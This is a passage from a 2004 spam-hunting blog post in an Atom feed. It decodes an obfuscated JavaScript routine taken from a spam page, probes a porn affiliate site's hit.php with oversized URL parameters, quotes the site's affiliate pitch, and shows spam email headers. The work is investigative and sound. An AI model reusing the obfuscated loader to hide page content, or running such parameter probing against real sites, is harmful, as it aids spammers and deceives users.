/&gt;&lt;form&gt;&lt;textarea cols=80 rows=5&gt;&lt;br /&gt;&amp;lt;script language="JavaScript"&amp;gt;function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,3,57,58,6,52,39,47,33,45,0,0,0,0,0,0,10,22,4,5,32,28,35,55,31,19,1,8,15,17,16,36,24,38,13,21,43,56,20,18,37,30,2,0,0,0,0,25,0,42,27,49,46,9,11,41,48,23,50,14,59,54,29,40,44,0,51,7,34,62,53,12,61,60,26);for(j=Math.ceil(l/b);j&amp;gt;0;j--){r='';for(i=Math.min(l,b);i&amp;gt;0;i--,l--){w|=(t[x.charCodeAt(p++)-48])&amp;lt;&amp;lt;s;if(s){r+=string.fromcharcode(165^w&amp;255);w&gt;&gt;=8;s-=2}else{s=6}}alert(r)}}decrypt_p("_mE5K6yQ7Q_5wsnjq7ecsTw5M02ceIyjk6gtMrE5e1yQ7Q2UGIk3DbLUciUv@f9vPYPXeuU8CYpjiswhiF_XCkyvBFwhsTyvJ1yvPA_81HRcK1pvSIpcw7phPA_8@7E3@IEhPYo3s0wQ@iRhfGoDRsn5S0gt@@95W7UceryjZbwcAGyt4Twj@ZEGws9tqG9tZQP8ZZEGws9De@P5@TEjsIyvPA_tK1yjNHwciF_Xez9ciTEjeHwcibRQVQPj@bwcMrpjfFeXezn5BsR5AFeXeYRhAryGBHEjqFeXe49jSF_XeQwh1sRQSQo5wsE5RF_6SA_tR1wrZGE5Pk_XSQov4HRhq7E0PW_tAbyvq1yjyFeXZjo6aHyrfYEjNHnFw328buzQFHL2o1Y8AH9cPYKcsTw5M02ceIyjkHP8fIwjqF28STEvsAUhiIwjqHpjiswhiF_XCtwcifwrffRrJsnrPA_8KIyvZryjR1wrZGE5PA_8fTyvqbRrH1yQ7Q2UGIk3DiovibwQsmE5Mix6@ao5Wfxts6wrffpcBbnrfzpjKTPrwsxtSGEvz@RQVA_XSA_X1zRQnkPvPY28CdwcK1wQs@x8CkyvBFwhsTyvJ1yvPA_8KIyvZryjWrEhMGwQSAKjBH9hw7ErqrphRsRQSAUj@HRhAryGq72T_aUUGIk3DbLUc72T_aPrMFEjbZ")&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;/textarea&gt;&lt;/form&gt;&lt;br /&gt;The page of course points to yet another site, http://www.blingcash.com/&lt;br /&gt;[urls]&lt;br /&gt;http://www.blingcash.com/exit/ex/&lt;br /&gt;http://www.blingcash.com/hit.php?w=100000&amp;s=8&amp;amp;p=2&lt;br /&gt;&lt;br /&gt;Blingcash seems to be nothing more then a porn site, however once you start playing with the variables new pages appear.&lt;br /&gt;&lt;form&gt;&lt;textarea cols=80 rows=5&gt;&lt;br /&gt;http://www.blingcash.com/hit.php?w=1000000000000000000000000000000000000000000000000000000&amp;s=800000000000000000000000000000000000&amp;amp;p=3&lt;br /&gt;&lt;/textarea&gt;&lt;/form&gt;&lt;br /&gt;The title of the page, BlingCash.com ::: Covert Like the Ole' Days!&lt;br /&gt;Ya the good ole days..&lt;br /&gt;Here was something disturbing.  It was targeted to people that were part of the reseller (spamming) program.  In particular&lt;br /&gt;"&lt;br /&gt;                                  What happens when your Epoch customer cancels&lt;br /&gt;&lt;br /&gt;                                  his membership with your paysite? Simply send&lt;br /&gt;&lt;br /&gt;                                  him one of our new cross sale mailers...a&lt;br /&gt;&lt;br /&gt;                                  single click later and you've earned $15.&lt;br /&gt;&lt;br /&gt;                                  Let us show you how to profit off cancellations!&lt;br /&gt;&lt;br /&gt;                                  CLICK HERE to learn more!&lt;br /&gt;"&lt;br /&gt;&lt;br /&gt;From there I found a contact page!&lt;br /&gt;&lt;p&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"&gt;&lt;strong&gt;US                                    Phone: &lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;                                &lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"&gt;(702)                                    547-0900&lt;/span&gt;&lt;/p&gt;                                   &lt;p&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"&gt;&lt;strong&gt;Canada                                    Phone: &lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;                                &lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"&gt;(416)                                    691-2812&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"&gt;&lt;strong&gt;Marketing                                    Email: &lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;                                &lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"&gt;&lt;a href="mailto:sales@blingcash.com"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;sales@blingcash.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;                                   &lt;p&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"&gt;&lt;strong&gt;Support                                    Email: &lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;                                &lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"&gt;&lt;a href="mailto:support@blingcash.com"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;support@blingcash.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;                                   &lt;p&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"&gt;&lt;strong&gt;ICQ                                    Contact : &lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;                                &lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"&gt;96944506&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;span style=";font-family:Verdana,Arial,Helvetica,sans-serif;font-size:85%;"&gt;OK I'll play.  Let's talk to the scum bag and see what he says.&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Return-Path: &lt;merryxeqh com=""&gt;&lt;br /&gt;Delivered-To: john@com&lt;br /&gt;Received: (qmail 22370 invoked from network); 9 Sep 2004 00:42:03 -0000&lt;br /&gt;Received: from unknown (HELO bebe.sylviidae.com) (209.200.9.195)&lt;br /&gt;by 2.69-93-235.reverse.theplanet.com with SMTP; 9 Sep 2004 00:42:03 -0000&lt;br /&gt;Received: from mail pickup service by citysilvia.com with Microsoft SMTPSVC;&lt;br /&gt;   Thu, 9 Sep 2004 08:50:47 -0800&lt;br /&gt;Received: from 104.106.80.174 by by7fd.bay7.citysilvia.com with HTTP;&lt;br /&gt;  Thu, 9 Sep 2004 08:50:47 GMT&lt;br /&gt;X-Originating-IP: [104.106.80.174]&lt;br /&gt;X-Originating-Email: [Merryxeqh@citysilvia.com]&lt;br /&gt;X-Sender: Merryxeqh@citysilvia.com&lt;br /&gt;From: Merry &lt;merryxeqh com=""&gt;&lt;br /&gt;To: John &lt;john com=""&gt;&lt;br /&gt;Subject: hi&lt;br /&gt;Date: 9 Sep 2004 08:50:47 -0400&lt;br /&gt;Mime-Version: 1.0&lt;br /&gt;Content-type: text/html&lt;br /&gt;Message-ID: &lt;sr0-f95ac23eb70ba7c673862a4f893f6e12 com=""&gt;&lt;br /&gt;Return-Path: &lt;merryxeqh com=""&gt;&lt;br /&gt;&lt;br /&gt;&lt;/merryxeqh&gt;&lt;/sr0-f95ac23eb70ba7c673862a4f893f6e12&gt;&lt;/john&gt;&lt;/merryxeqh&gt;&lt;/merryxeqh&gt;&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-109470486862410835?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/109470486862410835/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=109470486862410835' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109470486862410835'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/109470486862410835'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2004/09/first-post.html' title='First Post'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>1</thr:total></entry></feed>